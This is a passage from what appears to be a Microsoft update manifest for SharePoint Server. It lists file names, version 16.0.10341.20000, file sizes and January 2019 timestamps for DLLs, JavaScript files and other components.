16.0.10341.20000| 4582224| 16-Jan-19| 09:26 \nppt.conversion.mso20win32server.dll| mso20win32server.dll| 16.0.10341.20000| 4582224| 16-Jan-19| 09:26 \nppt.edit.mso20win32server.dll| mso20win32server.dll| 16.0.10341.20000| 4582224| 16-Jan-19| 09:26 \nwac.office.mso20win32server.dll| mso20win32server.dll| 16.0.10341.20000| 4582224| 16-Jan-19| 09:26 \nconversion.office.mso30win32server.dll| mso30win32server.dll| 16.0.10341.20000| 5636728| 16-Jan-19| 09:28 \nmso.mso30win32server.dll| mso30win32server.dll| 16.0.10341.20000| 5636728| 16-Jan-19| 09:28 \nppt.conversion.mso30win32server.dll| mso30win32server.dll| 16.0.10341.20000| 5636728| 16-Jan-19| 09:28 \nppt.edit.mso30win32server.dll| mso30win32server.dll| 16.0.10341.20000| 5636728| 16-Jan-19| 09:28 \nwac.office.mso30win32server.dll| mso30win32server.dll| 16.0.10341.20000| 5636728| 16-Jan-19| 09:28 \nconversion.office.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10341.20000| 12569720| 16-Jan-19| 09:39 \nppt.conversion.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10341.20000| 12569720| 16-Jan-19| 09:39 \nppt.edit.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10341.20000| 12569720| 16-Jan-19| 09:39 \nwac.office.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10341.20000| 12569720| 16-Jan-19| 09:39 \nconversion.office.mso98win32server.dll| mso98win32server.dll| 16.0.10341.20000| 3972216| 16-Jan-19| 09:52 \nppt.conversion.mso98win32server.dll| mso98win32server.dll| 16.0.10341.20000| 3972216| 16-Jan-19| 09:52 \nppt.edit.mso98win32server.dll| mso98win32server.dll| 16.0.10341.20000| 3972216| 16-Jan-19| 09:52 \nwac.office.mso98win32server.dll| mso98win32server.dll| 16.0.10341.20000| 3972216| 16-Jan-19| 09:52 \nconversion.office.msoserver.dll| msoserver.dll| 16.0.10341.20000| 14536312| 16-Jan-19| 09:36 \nppt.conversion.msoserver.dll| msoserver.dll| 16.0.10341.20000| 14536312| 16-Jan-19| 09:36 \nppt.edit.msoserver.dll| msoserver.dll| 16.0.10341.20000| 14536312| 16-Jan-19| 09:36 \nwac.office.msoserver.dll| msoserver.dll| 16.0.10341.20000| 14536312| 16-Jan-19| 09:36 \nconversion.office.oartserver.dll| oartserver.dll| 16.0.10341.20000| 18188416| 16-Jan-19| 09:58 \nppt.conversion.oartserver.dll| oartserver.dll| 16.0.10341.20000| 18188416| 16-Jan-19| 09:58 \nppt.edit.oartserver.dll| oartserver.dll| 16.0.10341.20000| 18188416| 16-Jan-19| 09:58 \nwac.office.oartserver.dll| oartserver.dll| 16.0.10341.20000| 18188416| 16-Jan-19| 09:58 \nconversionhtmlutil.dll| htmlutil.dll| 16.0.10341.20000| 2884216| 16-Jan-19| 09:37 \nonetutil.dll| onetutil.dll| 16.0.10341.20000| 2893656| 16-Jan-19| 09:37 \nconversion.office.osfsharedserver.dll| osfsharedserver.dll| 16.0.10341.20000| 748160| 16-Jan-19| 09:55 \nwac.office.osfsharedserver.dll| osfsharedserver.dll| 16.0.10341.20000| 748160| 16-Jan-19| 09:55 \nosfserver_activities_dll.x64| microsoft.sharepoint.workflowservices.activities.dll| 16.0.10341.20000| 294584| 16-Jan-19| 09:47 \nosfserver_workflow_dll| microsoft.sharepoint.workflowservices.dll| 16.0.10341.20000| 496312| 16-Jan-19| 09:46 \noffice_extension_manager_js| sp.officeextensionmanager.js| | 50904| 16-Jan-19| 09:50 \nmicrosoft.office.serviceinfrastructure.runtime.dll| microsoft.office.serviceinfrastructure.runtime.dll| 16.0.10341.20000| 1060048| 16-Jan-19| 09:57 \nugcdot.xml| feature.xml| | 629| 16-Jan-19| 09:47 \nmicrosoft.office.server.directory.sharepoint| microsoft.office.server.directory.sharepoint.dll| 16.0.10341.20000| 755904| 16-Jan-19| 09:58 \nmicrosoft.office.server.dll| microsoft.office.server.dll| 16.0.10341.20000| 3050304| 16-Jan-19| 09:57 \nmicrosoft.office.server.dll_isapi| microsoft.office.server.dll| 16.0.10341.20000| 3050304| 16-Jan-19| 09:57 \nmicrosoft.office.server.openxml.dll| microsoft.office.server.openxml.dll| 16.0.10341.20000| 1665168| 16-Jan-19| 09:57 \nmicrosoft.sharepoint.taxonomy.dll| microsoft.sharepoint.taxonomy.dll| 16.0.10341.20000| 1752920| 16-Jan-19| 09:58 \nmicrosoft.sharepoint.taxonomy.dll_gac| microsoft.sharepoint.taxonomy.dll| 16.0.10341.20000| 1752920| 16-Jan-19| 09:58 \nmicrosoft.sharepoint.taxonomy.dll_gac1| microsoft.sharepoint.taxonomy.dll| 16.0.10341.20000| 1752920| 16-Jan-19| 09:58 \nmediaplayer.xap| mediaplayer.xap| | 42433| 17-Jan-19| 05:09 \ndecompositiontree.xap| decompositiontree.xap| | 90619| 17-Jan-19| 05:09 \naddgal.xap| addgallery.xap| | 428188| 17-Jan-19| 05:09 \nwpgalim.xap| webpartgalleryimages.xap| | 100689| 17-Jan-19| 05:09 \naddgallery.xap_silverlight| addgallery.xap| | 394542| 17-Jan-19| 05:09 \nmicrosoft.sharepoint.client.xap| microsoft.sharepoint.client.xap| | 321016| 17-Jan-19| 05:09 \ndsigres.cab.x64| dsigres.cab| | 233193| 17-Jan-19| 05:09 \ndsigres.cab.x64_10266| dsigres.cab| | 233193| 17-Jan-19| 05:09 \ndsigres.cab.x64_1033| dsigres.cab| | 233193| 17-Jan-19| 05:09 \ndsigres.cab.x64_1087| dsigres.cab| | 233193| 17-Jan-19| 05:09 \ndsigctrl.cab.x64| dsigctrl.cab| | 482261| 17-Jan-19| 05:09 \ndsigres.cab.x86| dsigres.cab| | 194591| 17-Jan-19| 05:10 \ndsigres.cab.x86_10266| dsigres.cab| | 194591| 17-Jan-19| 05:10 \ndsigres.cab.x86_1033| dsigres.cab| | 194591| 17-Jan-19| 05:10 \ndsigres.cab.x86_1087| dsigres.cab| | 194591| 17-Jan-19| 05:10 \ndsigctrl.cab.x86| dsigctrl.cab| | 530389| 17-Jan-19| 05:10 \nppt.conversion.ppserver.dll| ppserver.dll| 16.0.10341.20000| 12235624| 16-Jan-19| 09:30 \nppt.edit.ppserver.dll| ppserver.dll| 16.0.10341.20000| 12235624| 16-Jan-19| 09:30 \npowerpointpowershell.format.ps1xml| powerpointpowershell.format.ps1xml| | 14355| 16-Jan-19| 09:57 \nschedengine_new.exe| schedengine.exe| 16.0.10341.20000| 16878272| 16-Jan-19| 09:39 \nmicrosoft.projectserver.client.silverlight.dll| microsoft.projectserver.client.silverlight.dll| 16.0.10341.20000| 399472| 16-Jan-19| 09:40 \nmicrosoft.projectserver.client.phone.dll| microsoft.projectserver.client.phone.dll| 16.0.10341.20000| 399480| 16-Jan-19| 09:32 \ncontentdatabasecreate.sql| contentdatabasecreate.sql| | 8400835| 16-Jan-19| 09:58 \nmicrosoft.office.project.server.database.dll| microsoft.office.project.server.database.dll| 16.0.10341.20000| 10374264| 16-Jan-19| 09:33 \nmicrosoft.office.project.server.database.extension.dll| microsoft.office.project.server.database.extension.dll| 16.0.10341.20000| 4382840| 16-Jan-19| 09:32 \nmicrosoft.office.project.server.dll| microsoft.office.project.server.dll| 16.0.10341.20000| 9610864| 16-Jan-19| 09:33 \nmicrosoft.office.project.shared.dll| microsoft.office.project.shared.dll| 16.0.10341.20000| 1905776| 16-Jan-19| 09:32 \nsdk.microsoft.office.project.shared.dll| microsoft.office.project.shared.dll| 16.0.10341.20000| 1905776| 16-Jan-19| 09:32 \nmicrosoft.projectserver.client.dll| microsoft.projectserver.client.dll| 16.0.10341.20000| 399072| 16-Jan-19| 09:32 \nmicrosoft.projectserver.client.dll_001| microsoft.projectserver.client.dll| 16.0.10341.20000| 399072| 16-Jan-19| 09:32 \nmicrosoft.projectserver.dll| microsoft.projectserver.dll| 16.0.10341.20000| 889560| 16-Jan-19| 09:32 \nmicrosoft.projectserver.dll_001| microsoft.projectserver.dll| 16.0.10341.20000| 889560| 16-Jan-19| 09:32 \nmicrosoft.projectserver.serverproxy.dll| microsoft.projectserver.serverproxy.dll| 16.0.10341.20000| 1302752| 16-Jan-19| 09:33 \nps.csom.scriptclient.debug.js| ps.debug.js| | 1017703| 16-Jan-19| 09:33 \nps.csom.scriptclient.js| ps.js| | 616270| 16-Jan-19| 09:32 \nmicrosoft.office.project.server.pwa.dll| microsoft.office.project.server.pwa.dll| 16.0.10341.20000| 2766560| 16-Jan-19| 09:33 \nmicrosoft.office.project.server.administration.dll| microsoft.office.project.server.administration.dll| 16.0.10341.20000| 1008760| 16-Jan-19| 09:26 \npwa.resx| pwa.resx| | 824177| 16-Jan-19| 09:28 \nmicrosoft.eedict_companies.de.dll| microsoft.eedict_companies.de| 16.0.10341.20000| 27256| 16-Jan-19| 09:53 \nmicrosoft.eedict_companies.dll| microsoft.eedict_companies| 16.0.10341.20000| 109872248| 16-Jan-19| 09:53 \nmicrosoft.eedict_companies.en.dll| microsoft.eedict_companies.en| 16.0.10341.20000| 25216| 16-Jan-19| 09:54 \nmicrosoft.eedict_companies.es.dll| microsoft.eedict_companies.es| 16.0.10341.20000| 25416| 16-Jan-19| 09:54 \nmicrosoft.eedict_companies.fr.dll| microsoft.eedict_companies.fr| 16.0.10341.20000| 33608| 16-Jan-19| 09:54 \nmicrosoft.eedict_companies.it.dll| microsoft.eedict_companies.it| 16.0.10341.20000| 55144| 16-Jan-19| 09:53 \nmicrosoft.eedict_companies.ja.dll| microsoft.eedict_companies.ja| 16.0.10341.20000| 1542264| 16-Jan-19| 09:54 \nmicrosoft.eedict_companies.nl.dll| microsoft.eedict_companies.nl| 16.0.10341.20000| 26744| 16-Jan-19| 09:53 \nmicrosoft.eedict_companies.no.dll| microsoft.eedict_companies.no| 16.0.10341.20000| 2106488| 16-Jan-19| 09:54 \nmicrosoft.eedict_companies.pt.dll| microsoft.eedict_companies.pt| 16.0.10341.20000| 26440| 16-Jan-19| 09:53 \nmicrosoft.eedict_companies.ru.dll| microsoft.eedict_companies.ru| 16.0.10341.20000| 33223288| 16-Jan-19| 09:53 \nmicrosoft.eedict_companies_acceptor.ar.dll| microsoft.eedict_companies_acceptor.ar| 16.0.10341.20000| 9896568| 16-Jan-19| 09:54 \nmicrosoft.stopworddictionary.dll| microsoft.stopworddictionary.dll| 16.0.10341.20000| 41080| 16-Jan-19| 09:54 \nmicrosoft.system_dictionaries_spellcheck.dll| microsoft.system_dictionaries_spellcheck.dll| 16.0.10341.20000| 24641144| 16-Jan-19| 09:54 \nodffilt.dll.x64| odffilt.dll| 16.0.10341.20000| 1874616| 16-Jan-19| 09:55 \nofffiltx.dll.x64| offfiltx.dll| 16.0.10341.20000| 2140040| 16-Jan-19| 09:56 \nmicrosoft.ceres.common.utils.dllmsil| microsoft.ceres.common.utils.dll| 16.0.10341.20000| 331112| 16-Jan-19| 09:56 \nmicrosoft.ceres.contentengine.contentpush.dll| microsoft.ceres.contentengine.contentpush.dll| 16.0.10341.20000| 168568| 16-Jan-19| 09:32 \nmicrosoft.ceres.contentengine.operators.mars.dll| microsoft.ceres.contentengine.operators.mars.dll| 16.0.10341.20000| 45688| 16-Jan-19| 09:51 \nmicrosoft.ceres.interactionengine.processing.builtin.dll| microsoft.ceres.interactionengine.processing.builtin.dll| 16.0.10341.20000| 410752| 16-Jan-19| 09:37 \nsearchcore.clustering.indexclusteringmember.dll| microsoft.ceres.searchcore.clustering.indexclusteringmember.dll| 16.0.10341.20000| 70776| 16-Jan-19| 09:56 \nsearchcore.clustering.indexclustermanager.dll| microsoft.ceres.searchcore.clustering.indexclustermanager.dll| 16.0.10341.20000| 136312| 16-Jan-19| 09:35 \nmicrosoft.ceres.searchcore.indexstorage.dll| microsoft.ceres.searchcore.indexstorage.dll| 16.0.10341.20000| 39248| 16-Jan-19| 09:56 \nmicrosoft.ceres.searchcore.journalshipper.dll| microsoft.ceres.searchcore.journalshipper.dll| 16.0.10341.20000| 95864| 16-Jan-19| 09:54 \nmicrosoft.ceres.searchcore.query.marslookupcomponent.dll| microsoft.ceres.searchcore.query.marslookupcomponent.dll| 16.0.10341.20000| 591208| 16-Jan-19| 09:56 \nmicrosoft.ceres.searchcore.seeding.dll| microsoft.ceres.searchcore.seeding.dll| 16.0.10341.20000| 141128| 16-Jan-19| 09:57 \nsrchccd.js| search.clientcontrols.debug.js| | 380392| 16-Jan-19| 09:48 \nsrchcc.js| search.clientcontrols.js| | 204087| 16-Jan-19| 09:48 \nsrchuicd.js| searchui.debug.js| | 116371| 16-Jan-19| 09:29 \nsrchuicc.js| searchui.js| | 50907| 16-Jan-19| 09:30 \nsearchom.dll| microsoft.office.server.search.dll| 16.0.10341.20000| 21182592| 16-Jan-19| 09:28 \nsearchom.dll_0001| microsoft.office.server.search.dll| 16.0.10341.20000| 21182592| 16-Jan-19| 09:28 \nsrchomnt.dll_1| microsoft.sharepoint.search.native.dll| 16.0.10341.20000| 493744| 16-Jan-19| 09:58 \nsetup.exe| setup.exe| 16.0.10341.20000| 1275520| 16-Jan-19| 09:57 \nsvrsetup.exe| setup.exe| 16.0.10341.20000| 1275520| 16-Jan-19| 09:57 \nsvrsetup.dll| svrsetup.dll| 16.0.10341.20000| 17390384| 16-Jan-19| 09:57 \nwsssetup.dll| wsssetup.dll| 16.0.10341.20000| 17390392| 16-Jan-19| 09:58 \nvisioserver.microsoft.office.graphics.shapebuilder.dll| microsoft.office.graphics.shapebuilder.dll| 16.0.10341.20000| 13102240| 16-Jan-19| 09:55 \nmicrosoft.fileservices.v2.dll| microsoft.fileservices.v2.dll| 16.0.10341.20000| 990528| 16-Jan-19| 09:27 \nspdxap.dll| microsoft.sharepoint.appmonitoring.applicationpages.dll| 16.0.10341.20000| 74328| 16-Jan-19| 09:57 \nmicrosoft.sharepoint.flighting.dll| microsoft.sharepoint.flighting.dll| 16.0.10341.20000| 2295144| 16-Jan-19| 09:55 \nactxprjlchrd.js| activexwinprojlauncher.debug.js| | 2095| 16-Jan-19| 09:33 \nactxprjlchr.js| activexwinprojlauncher.js| | 983| 16-Jan-19| 09:32 \nbitreeview.js| bitreeview.js| | 12879| 16-Jan-19| 09:32 \ncontentfollowing.debug.js| contentfollowing.debug.js| | 123898| 16-Jan-19| 09:33 \ncontentfollowing.js| contentfollowing.js| | 54228| 16-Jan-19| 09:32 \nfollowedtags.debug.js| followedtags.debug.js| | 6347| 16-Jan-19| 09:32 \nfollowedtags.js| followedtags.js| | 2726| 16-Jan-19| 09:32 \nfollowingcommon.debug.js| followingcommon.debug.js| | 21971| 16-Jan-19| 09:32 \nfollowingcommon.js| followingcommon.js| | 9646| 16-Jan-19| 09:33 \ngroup.debug.js| group.debug.js| | 125958| 16-Jan-19| 09:33 \ngroup.js| group.js| | 75983| 16-Jan-19| 09:33 \nhashtagprofile.debug.js| hashtagprofile.debug.js| | 6184| 16-Jan-19| 09:32 \nhashtagprofile.js| hashtagprofile.js| | 3285| 16-Jan-19| 09:32 \nhierarchytreeview.js| hierarchytreeview.js| | 8799| 16-Jan-19| 09:33 \nhtmlmenu.js| htmlmenus.js| | 21157| 16-Jan-19| 09:33 \nkpilro.js| kpilro.js| | 3182| 16-Jan-19| 09:32 \nmrudocs.debug.js| mrudocs.debug.js| | 9192| 16-Jan-19| 09:32 \nmrudocs.js| mrudocs.js| | 5862| 16-Jan-19| 09:33 \nmydocs.debug.js| mydocs.debug.js| | 73509| 16-Jan-19| 09:32 \nmydocs.js| mydocs.js| | 34453| 16-Jan-19| 09:33 \nmylinks.debug.js| mylinks.debug.js| | 7003| 16-Jan-19| 09:32 \nmylinks.js| mylinks.js| | 2629| 16-Jan-19| 09:33 \nmysiterecommendationsdebug.js| mysiterecommendations.debug.js| | 74467| 16-Jan-19| 09:32 \nmysiterecommendations.js| mysiterecommendations.js| | 41288| 16-Jan-19| 09:33 \nnotificationpanel.debug.js| notificationpanel.debug.js| | 14102| 16-Jan-19| 09:32 \nnotificationpanel.js| notificationpanel.js| | 7017| 16-Jan-19| 09:32 \nportal.debug.js| portal.debug.js| | 94804| 16-Jan-19| 09:33 \nportal.js| portal.js| | 52489| 16-Jan-19| 09:33 \nprbrows.debug.js| profilebrowsercontrol.debug.js| | 52762| 16-Jan-19| 09:32 \nprbrows.js| profilebrowsercontrol.js| | 28062| 16-Jan-19| 09:33 \nprojectsummary.debug.js| projectsummary.debug.js| | 36524| 16-Jan-19| 09:33 \nprojectsummary.js| projectsummary.js| | 13118| 16-Jan-19| 09:32 \nratings.js| ratings.js| | 18205| 16-Jan-19| 09:32 \nreputation.debug.js| reputation.debug.js| | 5317| 16-Jan-19| 09:32 \nreputation.js| reputation.js| | 3428| 16-Jan-19| 09:33 \nsoccom.js| socialcomment.js| | 23526| 16-Jan-19| 09:32 \nsocdata.js| socialdata.js| | 14889| 16-Jan-19| 09:32 \nsoctag.js| socialtag.js| | 9992| 16-Jan-19| 09:33 \nsprecdocsd.js| sp.recentdocs.debug.js| | 40634| 16-Jan-19| 09:33 \nsprecdocs.js| sp.recentdocs.js| | 18260| 16-Jan-19| 09:32 \nannouncementtilesdebug.js| sp.ui.announcementtiles.debug.js| | 14781| 16-Jan-19| 09:32 \nannouncementtiles.js| sp.ui.announcementtiles.js| | 8782| 16-Jan-19| 09:32 \nspui_cold.js| sp.ui.collabmailbox.debug.js| | 11768| 16-Jan-19| 09:33 \nspui_col.js| sp.ui.collabmailbox.js| | 7592| 16-Jan-19| 09:32 \ncommunities.js| sp.ui.communities.js| | 43973| 16-Jan-19| 09:33 \ncommunitiestileview.js| sp.ui.communities.tileview.js| | 8538| 16-Jan-19| 09:32 \ncommunityfeed.js| sp.ui.communityfeed.js| | 9997| 16-Jan-19| 09:32 \ncommunitymoderation.js| sp.ui.communitymoderation.js| | 8223| 16-Jan-19| 09:32 \nsp.ui.documentssharedbyme.debug.js| sp.ui.documentssharedbyme.debug.js| | 3174| 16-Jan-19| 09:32 \nsp.ui.documentssharedbyme.js| sp.ui.documentssharedbyme.js| | 2210| 16-Jan-19| 09:32 \nsp.ui.documentssharedwithme.debug.js| sp.ui.documentssharedwithme.debug.js| | 41725| 16-Jan-19| 09:33 \nsp.ui.documentssharedwithme.js| sp.ui.documentssharedwithme.js| | 24710| 16-Jan-19| 09:33 \nspui_listsearchbox_debug.js| sp.ui.listsearchbox.debug.js| | 39586| 16-Jan-19| 09:33 \nspui_listsearchbox.js| sp.ui.listsearchbox.js| | 20180| 16-Jan-19| 09:32 \nspui_listsearchboxbootstrap_debug.js| sp.ui.listsearchboxbootstrap.debug.js| | 7401| 16-Jan-19| 09:32 \nspui_listsearchboxbootstrap.js| sp.ui.listsearchboxbootstrap.js| | 3068| 16-Jan-19| 09:32 \nmicrofeeddebug.js| sp.ui.microfeed.debug.js| | 393708| 16-Jan-19| 09:33 \nmicrofeed.js| sp.ui.microfeed.js| | 230147| 16-Jan-19| 09:32 \nmysitecommondebug.js| sp.ui.mysitecommon.debug.js| | 131548| 16-Jan-19| 09:32 \nmysitecommon.js| sp.ui.mysitecommon.js| | 75538| 16-Jan-19| 09:33 \nmysitenavigationdebug.js| sp.ui.mysitenavigation.debug.js| | 2523| 16-Jan-19| 09:32 \nmysitenavigation.js| sp.ui.mysitenavigation.js| | 2523| 16-Jan-19| 09:32 \nmysiterecommendationsuidebug.js| sp.ui.mysiterecommendations.debug.js| | 14330| 16-Jan-19| 09:32 \nmysiterecommendationsui.js| sp.ui.mysiterecommendations.js| | 7266| 16-Jan-19| 09:32 \npeopledebug.js| sp.ui.people.debug.js| | 87048| 16-Jan-19| 09:32 \npeopledebug.js1| sp.ui.people.debug.js| | 87048| 16-Jan-19| 09:32 \npeople.js| sp.ui.people.js| | 59577| 16-Jan-19| 09:33 \npeople.js1| sp.ui.people.js| | 59577| 16-Jan-19| 09:33 \nspui_persond.js| sp.ui.person.debug.js| | 18230| 16-Jan-19| 09:33 \nspui_person.js| sp.ui.person.js| | 10324| 16-Jan-19| 09:33 \nspui_psd.js| sp.ui.promotedsites.debug.js| | 24862| 16-Jan-19| 09:32 \nspui_ps.js| sp.ui.promotedsites.js| | 15123| 16-Jan-19| 09:32 \nsp.ui.ratings.debug.js| sp.ui.ratings.debug.js| | 20220| 16-Jan-19| 09:32 \nsp.ui.ratings.js| sp.ui.ratings.js| | 11909| 16-Jan-19| 09:32 \nsp.ui.reputation.debug.js| sp.ui.reputation.debug.js| | 42482| 16-Jan-19| 09:32 \nsp.ui.reputation.js| sp.ui.reputation.js| | 25974| 16-Jan-19| 09:33 \nspssoc.js| sp.ui.socialribbon.js| | 20740| 16-Jan-19| 09:33 \nhomeapi.dll_gac| microsoft.sharepoint.homeapi.dll| 16.0.10341.20000| 360576| 16-Jan-19| 09:27 \nhomeapi.dll_isapi| microsoft.sharepoint.homeapi.dll| 16.0.10341.20000| 360576| 16-Jan-19| 09:27 \nportal.dll| microsoft.sharepoint.portal.dll| 16.0.10341.20000| 7001728| 16-Jan-19| 09:38 \nportal.dll_001| microsoft.sharepoint.portal.dll| 16.0.10341.20000| 7001728| 16-Jan-19| 09:38 \nstsapa.dll| microsoft.sharepoint.applicationpages.administration.dll| 16.0.10341.20000| 696976| 16-Jan-19| 09:48 \nwssadmop.dll_0001| microsoft.sharepoint.administrationoperation.dll| 16.0.10341.20000| 1181640| 16-Jan-19| 09:48 \nmicrosoft.sharepoint.health.dll| microsoft.sharepoint.health.dll| 16.0.10341.20000| 144624| 16-Jan-19| 09:54 \nmicrosoft.sharepoint.identitymodel.dll| microsoft.sharepoint.identitymodel.dll| 16.0.10341.20000| 658784| 16-Jan-19| 09:39 \nmicrosoft.sharepoint.client.dll.x64| microsoft.sharepoint.client.dll| 16.0.10341.20000| 862336| 16-Jan-19| 09:52 \nmicrosoft.sharepoint.client.dll_0001.x64| microsoft.sharepoint.client.dll| 16.0.10341.20000| 862336| 16-Jan-19| 09:52 \nmicrosoft.sharepoint.client.phone.dll| microsoft.sharepoint.client.phone.dll| 16.0.10341.20000| 807576| 16-Jan-19| 09:52 \nmicrosoft.sharepoint.client.portable.dll.x64| microsoft.sharepoint.client.portable.dll| 16.0.10341.20000| 822944| 16-Jan-19| 09:53 \nmicrosoft.sharepoint.client.portable.dll_gac.x64| microsoft.sharepoint.client.portable.dll| 16.0.10341.20000| 822944| 16-Jan-19| 09:53 \nmicrosoft.sharepoint.client.serverruntime.dll| microsoft.sharepoint.client.serverruntime.dll| 16.0.10341.20000| 749488| 16-Jan-19| 09:52 \nmicrosoft.sharepoint.client.serverruntime.dll_0001| microsoft.sharepoint.client.serverruntime.dll| 16.0.10341.20000| 749488| 16-Jan-19| 09:52 \nmicrosoft.sharepoint.client.silverlight.dll.x64| microsoft.sharepoint.client.silverlight.dll| 16.0.10341.20000| 806576| 16-Jan-19| 09:52 \noffprsx.dll| offparser.dll| 16.0.10341.20000| 2193040| 16-Jan-19| 09:33 \nowssvr.dll_0001| owssvr.dll| 16.0.10341.20000| 6903440| 16-Jan-19| 09:50 \nmicrosoft.sharepoint.powershell.dll_0001| microsoft.sharepoint.powershell.dll| 16.0.10341.20000| 1074320| 16-Jan-19| 09:56 \nmicrosoft.sharepoint.powershell.intl.dll| microsoft.sharepoint.powershell.intl.dll| 16.0.10341.20000| 105616| 16-Jan-19| 09:57 \npsconfig.exe| psconfig.exe| 16.0.10341.20000| 547232| 16-Jan-19| 09:36 \npsconfigui.exe| psconfigui.exe| 16.0.10341.20000| 818384| 16-Jan-19| 09:35 \nstsom.dll| microsoft.sharepoint.dll| 16.0.10341.20000| 38533728| 16-Jan-19| 09:32 \nstsom.dll_0001| microsoft.sharepoint.dll| 16.0.10341.20000| 38533728| 16-Jan-19| 09:32 \nstsomdr.dll| microsoft.sharepoint.intl.dll| 16.0.10341.20000| 1417360| 16-Jan-19| 09:31 \nstsap.dll| microsoft.sharepoint.applicationpages.dll| 16.0.10341.20000| 2454752| 16-Jan-19| 09:27 \nstssoap.dll| stssoap.dll| 16.0.10341.20000| 784528| 16-Jan-19| 09:40 \napplications.asx_0014| applications.aspx| | 3954| 16-Jan-19| 09:42 \napps.asx_0014| apps.aspx| | 3930| 16-Jan-19| 09:41 \nbackups.asx_0014| backups.aspx| | 3939| 16-Jan-19| 09:40 \nconfigurationwizards.asx_0014| configurationwizards.aspx| | 3978| 16-Jan-19| 09:41 \ndefault.asx_0014| default.aspx| | 5396| 16-Jan-19| 09:42 \ngenappsettings.asx_0014| generalapplicationsettings.aspx| | 3997| 16-Jan-19| 09:42 \nmonitoring.asx_0014| monitoring.aspx| | 3948| 16-Jan-19| 09:41 \no365config.asx_0015| office365configuration.aspx| | 5136| 16-Jan-19| 09:42 \nsecurity.asx_0014| security.aspx| | 3942| 16-Jan-19| 09:41 \nsysset.asx_0014| systemsettings.aspx| | 3960| 16-Jan-19| 09:42 \nupgandmig.asx_0014| upgradeandmigration.aspx| | 3975| 16-Jan-19| 09:42 \naccreqctl.debug.js| accessrequestscontrol.debug.js| | 20641| 16-Jan-19| 09:50 \naccreqctl.js| accessrequestscontrol.js| | 11659| 16-Jan-19| 09:50 \naccreqviewtmpl.debug.js| accessrequestsviewtemplate.debug.js| | 50013| 16-Jan-19| 09:50 \naccreqviewtmpl.js| accessrequestsviewtemplate.js| | 22931| 16-Jan-19| 09:49 \nappcatalogfieldtemplate.debug.js| appcatalogfieldtemplate.debug.js| | 9638| 16-Jan-19| 09:50 \nappcatalogfieldtemplate.js| appcatalogfieldtemplate.js| | 3693| 16-Jan-19| 09:49 \nappdeveloperdash.debug.js| appdeveloperdash.debug.js| | 23162| 16-Jan-19| 09:50 \nappdeveloperdash.js| appdeveloperdash.js| | 11550| 16-Jan-19| 09:49 \napprequestmanagefieldtemplate.debug.js| apprequestmanagefieldtemplate.debug.js| | 2771| 16-Jan-19| 09:50 \napprequestmanagefieldtemplate.js| apprequestmanagefieldtemplate.js| | 1474| 16-Jan-19| 09:49 \nautofill.debug.js| autofill.debug.js| | 20542| 16-Jan-19| 09:50 \nautofill.js| autofill.js| | 11560| 16-Jan-19| 09:50 \nautohostedlicensingtemplates.debug.js| autohostedlicensingtemplates.debug.js| | 21187| 16-Jan-19| 09:50 \nautohostedlicensingtemplates.js| autohostedlicensingtemplates.js| | 8987| 16-Jan-19| 09:50 \nbform.debug.js| bform.debug.js| | 460795| 16-Jan-19| 09:49 \nbform.js| bform.js| | 259447| 16-Jan-19| 09:50 \nblank.debug.js| blank.debug.js| | 755| 16-Jan-19| 09:50 \nblank.js| blank.js| | 454| 16-Jan-19| 09:50 \ncallout.debug.js| callout.debug.js| | 92039| 16-Jan-19| 09:50 \ncallout.js| callout.js| | 29821| 16-Jan-19| 09:50 \nchoicebuttonfieldtemplate.debug.js| choicebuttonfieldtemplate.debug.js| | 6382| 16-Jan-19| 09:49 \nchoicebuttonfieldtemplate.js| choicebuttonfieldtemplate.js| | 2741| 16-Jan-19| 09:50 \nclientforms.debug.js| clientforms.debug.js| | 155351| 16-Jan-19| 09:50 \nclientforms.js| clientforms.js| | 78855| 16-Jan-19| 09:50 \nclientpeoplepicker.debug.js| clientpeoplepicker.debug.js| | 83399| 16-Jan-19| 09:49 \nclientpeoplepicker.js| clientpeoplepicker.js| | 44296| 16-Jan-19| 09:50 \nclientrenderer.debug.js| clientrenderer.debug.js| | 30681| 16-Jan-19| 09:49 \nclientrenderer.js| clientrenderer.js| | 12958| 16-Jan-19| 09:50 \nclienttemplates.debug.js| clienttemplates.debug.js| | 397742| 16-Jan-19| 09:50 \nclienttemplates.js| clienttemplates.js| | 203207| 16-Jan-19| 09:50 \ncommonvalidation.debug.js| commonvalidation.debug.js| | 6758| 16-Jan-19| 09:50 \ncomval.js| commonvalidation.js| | 4222| 16-Jan-19| 09:50 \ncore.debug.js| core.debug.js| | 955606| 16-Jan-19| 09:49 \ncore.js_0001| core.js| | 506884| 16-Jan-19| 09:50 \ncreatesharedfolderdialog.debug.js| createsharedfolderdialog.debug.js| | 42912| 16-Jan-19| 09:50 \ncreatesharedfolderdialog.js| createsharedfolderdialog.js| | 18730| 16-Jan-19| 09:50 \ndatepicker.debug.js| datepicker.debug.js| | 160256| 16-Jan-19| 09:49 \ndatepick.js| datepicker.js| | 71406| 16-Jan-19| 09:50 \ndesigngallery.debug.js| designgallery.debug.js| | 47390| 16-Jan-19| 09:49 \ndesigngallery.js| designgallery.js| | 29173| 16-Jan-19| 09:50 \ndevdash.debug.js| devdash.debug.js| | 89841| 16-Jan-19| 09:50 \ndevdash.js| devdash.js| | 38402| 16-Jan-19| 09:50 \ndragdrop.debug.js| dragdrop.debug.js| | 237831| 16-Jan-19| 09:49 \ndragdrop.js| dragdrop.js| | 122516| 16-Jan-19| 09:50 \nentityeditor.debug.js| entityeditor.debug.js| | 73995| 16-Jan-19| 09:50 \nentityeditor.js| entityeditor.js| | 38997| 16-Jan-19| 09:49 \nfilepreview.debug.js| filepreview.debug.js| | 25986| 16-Jan-19| 09:50 \nfilepreview.js| filepreview.js| | 14044| 16-Jan-19| 09:50 \nfoldhyperlink.debug.js| foldhyperlink.debug.js| | 3924| 16-Jan-19| 09:50 \nfoldhyperlink.js| foldhyperlink.js| | 1861| 16-Jan-19| 09:50 \nform.debug.js| form.debug.js| | 241306| 16-Jan-19| 09:50 \nform.js| form.js| | 129250| 16-Jan-19| 09:50 \nganttscript.debug.js| ganttscript.debug.js| | 9384| 16-Jan-19| 09:49 \nganttscr.js| ganttscript.js| | 5098| 16-Jan-19| 09:50 \ngeolocationfieldtemplate.debug.js| geolocationfieldtemplate.debug.js| | 40968| 16-Jan-19| 09:50 \ngeolocationfieldtemplate.js| geolocationfieldtemplate.js| | 15411| 16-Jan-19| 09:50 \ngroupboard.debug.js| 